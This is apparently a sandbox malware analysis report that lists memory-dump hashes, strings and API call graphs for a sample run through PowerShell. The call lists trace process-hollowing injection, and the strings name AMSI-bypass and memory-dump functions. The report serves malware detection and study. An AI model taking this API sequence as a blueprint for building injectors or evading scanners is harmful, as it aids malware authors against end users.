                                                                                                                                        • Opcode ID: b456a72c77f434603d0d604045c7747802ecab68f4372e2558b206b442820546
                                                                                                                                        • Instruction ID: 69ab45cbf1c494ae31f23f25d1e1140ce2fa68b1e3ad17e9e16cd08bb67c5d89
                                                                                                                                        • Opcode Fuzzy Hash: b456a72c77f434603d0d604045c7747802ecab68f4372e2558b206b442820546
                                                                                                                                        • Instruction Fuzzy Hash: 36F0FC716082D48FD705AB7494583EF3FB1DFC1325F14809ED9454B395CD392845C7A6
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000007.00000002.23005970295.00000000047CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 047CD000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_7_2_47cd000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: cd4fff58809099c5b25c5c561b213fa107af86f0df041c5e914330cf3e14e778
                                                                                                                                        • Instruction ID: e07965327ab704fabe9600653e0129282303de3ba28b3e769ee7256e4c10422e
                                                                                                                                        • Opcode Fuzzy Hash: cd4fff58809099c5b25c5c561b213fa107af86f0df041c5e914330cf3e14e778
                                                                                                                                        • Instruction Fuzzy Hash: 70F0F97A504680AFD725CF06CD85D23BBF9EB89720B19C49DA85A4B752C630FC42CF60
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000007.00000002.23023795011.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_7_2_6cc0000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: d00a54e0dbc8dccede476f1139218f94e93af47bf3b777e0c9475c8f47fd9077
                                                                                                                                        • Instruction ID: 825980c87ca87e1eb8cc75ba836f08234514b853527b8c60a0ac92ce9b52a259
                                                                                                                                        • Opcode Fuzzy Hash: d00a54e0dbc8dccede476f1139218f94e93af47bf3b777e0c9475c8f47fd9077
                                                                                                                                        • Instruction Fuzzy Hash: A5F0A7B56042145BE3447B69D4587AF7BA6DBC0329F14812DC91A5B384CE3A3D058BE5
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000007.00000002.23023795011.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_7_2_6cc0000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: d5a47dfa6fce4c9d96caf2c56df6bc1d9ffa169870a4e954d8420ba1f9f9ff3b
                                                                                                                                        • Instruction ID: 39b3d6840afcc85c19181af3c94c0725a9fbaa4e955add5db40c30779f5ac7b2
                                                                                                                                        • Opcode Fuzzy Hash: d5a47dfa6fce4c9d96caf2c56df6bc1d9ffa169870a4e954d8420ba1f9f9ff3b
                                                                                                                                        • Instruction Fuzzy Hash: B2F0E23130A3505F8721AF3DB84884ABFF0EEC9220305466FE84AC7353C6748909CBA1
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000007.00000002.23023795011.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_7_2_6cc0000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 1bd9c72a57800d2568d7a7346ec79db0f812abca6eb8d3f6ad7b2dfb2158c418
                                                                                                                                        • Instruction ID: 9cb94bd6ebbb7c9eef6d0a122d6e9e1ec1e7d6d481c2339028fd56364ab6557f
                                                                                                                                        • Opcode Fuzzy Hash: 1bd9c72a57800d2568d7a7346ec79db0f812abca6eb8d3f6ad7b2dfb2158c418
                                                                                                                                        • Instruction Fuzzy Hash: A8F0587090A3008FD760EBB8D49C3AABFE2FB44310F1448AED18AC6681DBB958458B90
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000007.00000002.23023795011.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_7_2_6cc0000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: f400b95f91ea4542d8d858fea25551b7a873daedab04cef7dadecc1da585c196
                                                                                                                                        • Instruction ID: 2383d37adbe8070d0bd029d92cec6ec3644bd384c59f055030ee87cd8909b56b
                                                                                                                                        • Opcode Fuzzy Hash: f400b95f91ea4542d8d858fea25551b7a873daedab04cef7dadecc1da585c196
                                                                                                                                        • Instruction Fuzzy Hash: 0CF01235A001089FDB04CB8DD890AEEF7B1FF88324F208159E515A73A0C732E962CB60
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000007.00000002.23023795011.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_7_2_6cc0000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 6bdb1cedbd025a695593ac4ed57c17f03d6926667e08a74d0d0fc20fd93be85d
                                                                                                                                        • Instruction ID: 2fceeef31ea6ba3fd0d7e25160d186ca1ef595e029e5d1e8daee5a5d7151a9ba
                                                                                                                                        • Opcode Fuzzy Hash: 6bdb1cedbd025a695593ac4ed57c17f03d6926667e08a74d0d0fc20fd93be85d
                                                                                                                                        • Instruction Fuzzy Hash: BBE0D82174B2B10BC7D961B91C24BBF5E8A5FC307574E01BEC644DB343C980C80643A1
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000007.00000002.23023795011.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_7_2_6cc0000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: de0e531be19091703fbfaed77d7ab895ddca69b2f3ef2489f9d1a789305c7408
                                                                                                                                        • Instruction ID: ffd9b314ca489a40a31f7ecd88410ca690a1febe1a56f9d60ffde9b5bb284878
                                                                                                                                        • Opcode Fuzzy Hash: de0e531be19091703fbfaed77d7ab895ddca69b2f3ef2489f9d1a789305c7408
                                                                                                                                        • Instruction Fuzzy Hash: 12F08C313092519FC749ABB4985C69EBB62ABC4329F0580AFD1098B783CF7558068796
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000007.00000002.23023795011.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_7_2_6cc0000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: f7ff8c79ac0ced1d75b0f05163a2e3539099bab45abc70e090084924763db896
                                                                                                                                        • Instruction ID: 5cbcc2866098322432b34a827f0dc39d314e05cf75b7290a31756e6466fced72
                                                                                                                                        • Opcode Fuzzy Hash: f7ff8c79ac0ced1d75b0f05163a2e3539099bab45abc70e090084924763db896
                                                                                                                                        • Instruction Fuzzy Hash: 92F0ED70A053049FD764ABB9D49C7ABBBE5FB44314F10446EE55EC7340DB3969448B90
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000007.00000002.23023795011.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_7_2_6cc0000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 4e6da0b1cb65799d3b4242c02baee4c2a02cc9c59bd191839942cc572a058f51
                                                                                                                                        • Instruction ID: c96df7ef8a944b7877a7dea5a9998863bf6186ea955fb87b30e923d8ed13110d
                                                                                                                                        • Opcode Fuzzy Hash: 4e6da0b1cb65799d3b4242c02baee4c2a02cc9c59bd191839942cc572a058f51
                                                                                                                                        • Instruction Fuzzy Hash: C8E01A327057249F8324AF6EB44485ABBE9FBC8661304452EE94AC3301DA74A9058BE5
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000007.00000002.23023795011.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_7_2_6cc0000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: a55853a30337eb20d14b4bc4b39ef6f1b9bd538e3f3916fdea34ea74c8c87b8f
                                                                                                                                        • Instruction ID: 07a7201b90aa50d1d5554e4476477f90ab3c7209e6601d5cf275cd746fc408df
                                                                                                                                        • Opcode Fuzzy Hash: a55853a30337eb20d14b4bc4b39ef6f1b9bd538e3f3916fdea34ea74c8c87b8f
                                                                                                                                        • Instruction Fuzzy Hash: 44E0863570C6149FCB097BB9A81C2AEBA5AEBC4725F04402ED50683742CF79590197D5
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000007.00000002.23023795011.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_7_2_6cc0000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 3ef7c5dac38a914c86f0af85ed53347a3b19c53a2609a62b3b5cfe335fdf713c
                                                                                                                                        • Instruction ID: a71294d5027d7f28a15a0518a90b19b2aaccf0d2dbd9523b46b5cf492aba8cef
                                                                                                                                        • Opcode Fuzzy Hash: 3ef7c5dac38a914c86f0af85ed53347a3b19c53a2609a62b3b5cfe335fdf713c
                                                                                                                                        • Instruction Fuzzy Hash: 22D05B32B485551B4BC9616D681055A3AA7C7C657070984BEE558C7312EC11CC1A57D1
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000007.00000002.23023795011.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_7_2_6cc0000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 45951ff2173cad3fc891448dca58cb883ea6b1abfc71894bca768129cca72387
                                                                                                                                        • Instruction ID: 6eba385aada1de84e5235d880f259f8505d9fa05d9c4e230b6c359a0b3059a67
                                                                                                                                        • Opcode Fuzzy Hash: 45951ff2173cad3fc891448dca58cb883ea6b1abfc71894bca768129cca72387
                                                                                                                                        • Instruction Fuzzy Hash: F4D05E62B522350705D830EA2C3877BAACE8BC74B274A013EDB14D3345EC50DC0113F1
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000007.00000002.23023795011.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_7_2_6cc0000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 57d2866c0797f6d4af13eeb9ce39f932fc19852bf26416183e86a4d44b818489
                                                                                                                                        • Instruction ID: b9aaed94f5f790d6c6ac7d5348887e41e8855a89edfa02415e6fcba8dc59df79
                                                                                                                                        • Opcode Fuzzy Hash: 57d2866c0797f6d4af13eeb9ce39f932fc19852bf26416183e86a4d44b818489
                                                                                                                                        • Instruction Fuzzy Hash: 7AE09270D052495F8340DFAC84021AEFFF4AB04210B1080EFC808D7202E63246029BD1
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000007.00000002.23023795011.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_7_2_6cc0000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 0db4242b1685a43706c9005a679e85225a0317807ec3f3471aa76743baf19071
                                                                                                                                        • Instruction ID: 9780a8082f75f4eaf59fae91854e2a78ed2c81caf6694c28363bfe04108ed81b
                                                                                                                                        • Opcode Fuzzy Hash: 0db4242b1685a43706c9005a679e85225a0317807ec3f3471aa76743baf19071
                                                                                                                                        • Instruction Fuzzy Hash: 62E04F3480D1898FCF0AEB64D49A8FDBF74DE42215B1001ADD91B96292DA31058FCF81
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000007.00000002.23023795011.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_7_2_6cc0000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 2bbe8dbff536bdc16e2d7d855452593c7688757795a1eebfbde5de041b65d6b5
                                                                                                                                        • Instruction ID: 4fd90164eb424f67d8b4a71b07a0c67f47aa0c3111a69a216d62c881f22d061e
                                                                                                                                        • Opcode Fuzzy Hash: 2bbe8dbff536bdc16e2d7d855452593c7688757795a1eebfbde5de041b65d6b5
                                                                                                                                        • Instruction Fuzzy Hash: 25E04F34A08185DFDB44EF74D49A47D7FB1EB85204B00429DD885D7365DB312881CF81
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000007.00000002.23023795011.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_7_2_6cc0000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                                                        • Instruction ID: cf3beda674925b8e676c9e0172818a9e8af1835d99c2ec6c44abdf2490f080ce
                                                                                                                                        • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                                                        • Instruction Fuzzy Hash: D2D067B1D042099F8780EFADC9415AEFBF4EF48214F6085AEC919E7311E7329A128FD1
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000007.00000002.23023795011.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_7_2_6cc0000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 5cde2be6370ab4956efc443d6dc338c1b50e9b1a6a95f13a7fec4919d2060ca0
                                                                                                                                        • Instruction ID: 406f038fa0297fe788215a18fab4b5b16dcd81134c57b746d286afb053b1a06e
                                                                                                                                        • Opcode Fuzzy Hash: 5cde2be6370ab4956efc443d6dc338c1b50e9b1a6a95f13a7fec4919d2060ca0
                                                                                                                                        • Instruction Fuzzy Hash: A0D04234A182099F8B44EBA5E45646ABBB5EB84205F004269E90AD3751EA306D51CFD1
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000007.00000002.23023795011.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_7_2_6cc0000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: ed23bdf6709b26db0b3a6c0ec2ee8c56821bbbf62072a346787a45056c5b2946
                                                                                                                                        • Instruction ID: c2b3eb38b2faaf3c3da8fe8eaab2ddfaedf2e0f69c611ec8365fda47f6aa3ecc
                                                                                                                                        • Opcode Fuzzy Hash: ed23bdf6709b26db0b3a6c0ec2ee8c56821bbbf62072a346787a45056c5b2946
                                                                                                                                        • Instruction Fuzzy Hash: CCD067308081099FCB08BBA5E85A4BDBF34EB54605F40416EE917D26D1AA30599ADED5
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000007.00000002.23023795011.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_7_2_6cc0000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: X`r$X`r$X`r$X`r$X`r$X`r$X`r$X`r$X`r$X`r$X`r$X`r$$\r$$\r
                                                                                                                                        • API String ID: 0-446806649
                                                                                                                                        • Opcode ID: cafde7cd63c0b04d6a79fe91484a43ab5f164fa4e7844de4c30aa4efa06e3f51
                                                                                                                                        • Instruction ID: 2b80c06aae9210e3b2ee8b824f7ebc8ebb9e4fa3eb52dea2963d8cda5859bfae
                                                                                                                                        • Opcode Fuzzy Hash: cafde7cd63c0b04d6a79fe91484a43ab5f164fa4e7844de4c30aa4efa06e3f51
                                                                                                                                        • Instruction Fuzzy Hash: 1CC12974B043588FE7A8DF79C5947A9B7E2AF84300F2084BEC54AA7395DF349D418B52
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000007.00000002.23023795011.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_7_2_6cc0000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: X`r$X`r$X`r$X`r$X`r$X`r$X`r$X`r$X`r$X`r$X`r$X`r$$\r
                                                                                                                                        • API String ID: 0-2487315717
                                                                                                                                        • Opcode ID: 777bb85f3e25b6a3e6cc33f1a453cf90cf7106d28caf95d56ded080fcfe8e740
                                                                                                                                        • Instruction ID: a998ed6a476c71bf2ce0e44019656044efe775a8b26c324183a760180c8b14fd
                                                                                                                                        • Opcode Fuzzy Hash: 777bb85f3e25b6a3e6cc33f1a453cf90cf7106d28caf95d56ded080fcfe8e740
                                                                                                                                        • Instruction Fuzzy Hash: E4B13874A053948FE7A89F78C5847A9B7F2AF84300F2084BEC54AA7395DF349D808B52
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000007.00000002.23027755201.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_7_2_77d0000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: 4'\r$4'\r$tP\r$tP\r$$\r$$\r$$\r$$\r
                                                                                                                                        • API String ID: 0-4015598155
Strings
Memory Dump Source
• Source File: 00000007.00000002.23027755201.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_77d0000_powershell.jbxd
Similarity
• API ID:
• String ID: 4'\r$4'\r$4'\r$4'\r$tP\r$tP\r
• API String ID: 0-1384849700
Strings
Memory Dump Source
• Source File: 00000007.00000002.23027755201.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_77d0000_powershell.jbxd
Similarity
• API ID:
• String ID: far$4'\r$4'\r$4'\r$4'\r
• API String ID: 0-3332724161
Strings
Memory Dump Source
• Source File: 00000007.00000002.23027755201.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_77d0000_powershell.jbxd
Similarity
• API ID:
• String ID: 4'\r$4'\r$$\r$$\r$$\r
• API String ID: 0-983056022
Strings
Memory Dump Source
• Source File: 00000007.00000002.23027755201.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_77d0000_powershell.jbxd
Similarity
• API ID:
• String ID: $\r$$\r$$\r$$\r
• API String ID: 0-937398501

Execution Graph

Execution Coverage: 9.2%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 0%
Total number of Nodes: 178
Total number of Limit Nodes: 14

Control-flow Graph

• Executed
• Not Executed
APIs
  • Part of subcall function 02E2881C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02E28903), ref: 02E28860
  • Part of subcall function 02E2881C: GetProcAddress.KERNEL32(02E71384,00000000), ref: 02E28879
  • Part of subcall function 02E2881C: FreeLibrary.KERNEL32(02E71384,00000000,02E71388,Function_000055D8,00000004,02E71398,02E71388,000186A3,00000040,02E7139C,02E71384,00000000,00000000,00000000,00000000,02E28903), ref: 02E288E3
  • Part of subcall function 02E285D4: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02E28660
• GetThreadContext.KERNEL32(02E713D0,02E71420,ScanString,02E713A4,02E2A774,UacInitialize,02E713A4,02E2A774,ScanBuffer,02E713A4,02E2A774,ScanBuffer,02E713A4,02E2A774,UacInitialize,02E713A4), ref: 02E2943A
  • Part of subcall function 02E2824C: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02E282BD
  • Part of subcall function 02E284BC: NtUnmapViewOfSection.NTDLL(?,?), ref: 02E28521
  • Part of subcall function 02E279AC: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02E27A1F
  • Part of subcall function 02E27CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02E27D6C
• SetThreadContext.KERNEL32(02E713D0,02E71420,ScanBuffer,02E713A4,02E2A774,ScanString,02E713A4,02E2A774,Initialize,02E713A4,02E2A774,02E713CC,02E714BC,02E714F8,00000004,02E714FC), ref: 02E2A14F
• NtResumeThread.NTDLL(02E713D0,00000000), ref: 02E2A15C
  • Part of subcall function 02E28798: LoadLibraryW.KERNEL32(?,?), ref: 02E287AC
  • Part of subcall function 02E28798: GetProcAddress.KERNEL32(02E71390,BCryptVerifySignature), ref: 02E287C6
  • Part of subcall function 02E28798: FreeLibrary.KERNEL32(02E71390,02E71390,BCryptVerifySignature,bcrypt,?,02E713D0,00000000,02E713A4,02E2A3BF,ScanString,02E713A4,02E2A774,ScanBuffer,02E713A4,02E2A774,Initialize), ref: 02E28802
Strings
Memory Dump Source
• Source File: 0000000C.00000002.23065524959.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_2e11000_Oupzhkpr.jbxd
Similarity
• API ID: LibraryMemoryThreadVirtual$AddressContextFreeProc$AllocateCreateHandleLoadModuleProcessReadResumeSectionUnmapUserViewWrite
• String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
• API String ID: 59011937-51457883

Control-flow Graph

• Executed
• Not Executed
2e1494c call 2e14798 call 2e1494c call 2e28798 call 2e1480c call 2e1494c call 2e14798 call 2e1494c call 2e28798 call 2e1480c call 2e1494c call 2e14798 call 2e1494c call 2e28798 call 2e27ecc call 2e28798 * 2 8154->8205 8206 2e29ca9-2e29cf6 call 2e289b0 call 2e289a4 8154->8206 8205->7688 8206->8205
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 02E2881C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02E28903), ref: 02E28860
                                                                                                                                          • Part of subcall function 02E2881C: GetProcAddress.KERNEL32(02E71384,00000000), ref: 02E28879
                                                                                                                                          • Part of subcall function 02E2881C: FreeLibrary.KERNEL32(02E71384,00000000,02E71388,Function_000055D8,00000004,02E71398,02E71388,000186A3,00000040,02E7139C,02E71384,00000000,00000000,00000000,00000000,02E28903), ref: 02E288E3
                                                                                                                                          • Part of subcall function 02E285D4: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02E28660
                                                                                                                                        • GetThreadContext.KERNEL32(02E713D0,02E71420,ScanString,02E713A4,02E2A774,UacInitialize,02E713A4,02E2A774,ScanBuffer,02E713A4,02E2A774,ScanBuffer,02E713A4,02E2A774,UacInitialize,02E713A4), ref: 02E2943A
                                                                                                                                          • Part of subcall function 02E2824C: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02E282BD
                                                                                                                                          • Part of subcall function 02E284BC: NtUnmapViewOfSection.NTDLL(?,?), ref: 02E28521
                                                                                                                                          • Part of subcall function 02E279AC: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02E27A1F
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.23065524959.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_2e11000_Oupzhkpr.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MemoryVirtual$AddressAllocateContextCreateFreeHandleLibraryModuleProcProcessReadSectionThreadUnmapUserView
                                                                                                                                        • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                                                                                        • API String ID: 1291004003-51457883
                                                                                                                                        • Opcode ID: a34dbf8257b169a1fa7e2df190d608e36f8edd0216237356113b6b6bbb5ae6b9
                                                                                                                                        • Instruction ID: 831b16bb12cb97f8e49f54942aebeae362ef25f2a050226ef551f172ee4605b3
                                                                                                                                        • Opcode Fuzzy Hash: a34dbf8257b169a1fa7e2df190d608e36f8edd0216237356113b6b6bbb5ae6b9
                                                                                                                                        • Instruction Fuzzy Hash: 73E21C35AD01699FDB11EB64CD91ADE73FAAF45310F10E1B1B00AAB354DA30AE89CF54

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 02E15A94
                                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02E15AB2
                                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02E15AD0
                                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02E15AEE
                                                                                                                                        • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,02E15B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02E15B37
                                                                                                                                        • RegQueryValueExA.ADVAPI32(?,02E15CE4,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,02E15B7D,?,80000001), ref: 02E15B55
                                                                                                                                        • RegCloseKey.ADVAPI32(?,02E15B84,00000000,00000000,00000005,00000000,02E15B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02E15B77
